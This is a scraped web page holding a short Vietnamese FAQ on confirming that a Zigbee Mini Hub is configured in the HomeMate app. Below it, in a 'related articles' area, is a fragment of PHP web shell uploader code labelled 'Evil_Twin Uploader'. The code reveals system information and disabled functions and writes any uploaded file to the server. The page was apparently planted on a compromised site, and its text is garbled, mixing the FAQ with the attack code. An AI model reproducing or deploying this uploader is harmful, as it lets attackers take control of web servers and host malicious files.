Evil_Twin Uploader

Làm thế nào để biết thiết bị Zigbee Mini Hub của tôi đã cấu hình thành công?

Bạn hãy đi đến trang “Cá nhân” trên ứng dụng “HomeMate”, sau đó bạn có thể tìm thấy thiết bị Zigbee Mini Hub đã cấu hình thành công trong mục “Thiết bị của tôi”.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial